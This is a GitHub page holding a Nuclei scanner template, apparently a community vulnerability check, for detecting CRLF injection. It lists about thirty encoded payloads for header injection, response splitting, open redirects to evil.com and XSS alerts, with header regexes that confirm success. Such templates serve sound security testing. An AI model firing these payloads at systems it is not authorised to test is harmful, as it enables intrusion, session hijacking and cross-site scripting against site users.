forked from coffinxp/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcRlf.yaml
More file actions
68 lines (66 loc) · 3.14 KB
/
cRlf.yaml
File metadata and controls
68 lines (66 loc) · 3.14 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
id: crlf-injection-extended
info:
name: CRLF Injection Extended Detection
author: coffin
severity: high
description: Detects a wide range of CRLF injection vectors that can be exploited for header injection, response splitting, and XSS.
reference:
- https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
tags: crlf, header-injection, response-splitting, xss
metadata:
max-request: 5
http:
- method: GET
path:
- "{{BaseURL}}/%%0a0aSet-Cookie:coffin=hi"
- "{{BaseURL}}/%0aSet-Cookie:coffin=hi;"
- "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
- "{{BaseURL}}/%0d%0aLocation: http://evil.com"
- "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23"
- "{{BaseURL}}/%0d%0a%0d%0a<script>alert('XSS')</script>;"
- "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e"
- "{{BaseURL}}/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('XSS');</script>"
- "{{BaseURL}}/%0d%0aHost: {{Hostname}}%0d%0aCookie: coffin=hi%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: coffin=hi%0d%0a%0d%0a"
- "{{BaseURL}}/%0d%0aLocation: www.evil.com"
- "{{BaseURL}}/%0d%0aSet-Cookie:coffin=hi;"
- "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
- "{{BaseURL}}/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<svg/onload=alert(document.domain)>"
- "{{BaseURL}}/%23%0aSet-Cookie:coffin=hi"
- "{{BaseURL}}/%25%30%61Set-Cookie:coffin=hi"
- "{{BaseURL}}/%2e%2e%2f%0d%0aSet-Cookie:coffin=hi"
- "{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a<script>alert(document.cookie)</script>%2F../%2F..%2F..%2F..%2F../tr"
- "{{BaseURL}}/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<script>alert(document.domain)</script>"
- "{{BaseURL}}/%5Cr%20Set-Cookie:coffin=hi;"
- "{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:coffin=hi;"
- "{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;"
- "{{BaseURL}}/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;"
- "{{BaseURL}}/%E5%98%8A%E5%98%8DLocation:www.evil.com"
- "{{BaseURL}}/%E5%98%8D%E5%98%8ALocation:www.evil.com"
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi"
- "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi;"
- "{{BaseURL}}/%u000ASet-Cookie:coffin=hi;"
- "{{BaseURL}}/www.evil.com/%2E%2E%2F%0D%0ASet-Cookie:coffin=hi;"
- "{{BaseURL}}/www.evil.com/%2F..%0D%0ASet-Cookie:coffin=hi;"
stop-at-first-match: false
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?i)(location\s*:\s*(http[s]?:)?//?www\.evil\.com)'
- '(?i)(set-cookie\s*:\s*coffin\s*=\s*hi)'
- '(?i)(coffin-x\s*:\s*coffin-x)'
- type: status
status:
- 200
- 201
- 202
- 204
- 205
- 206
- 207
- 301
- 302
- 307
- 308
condition: or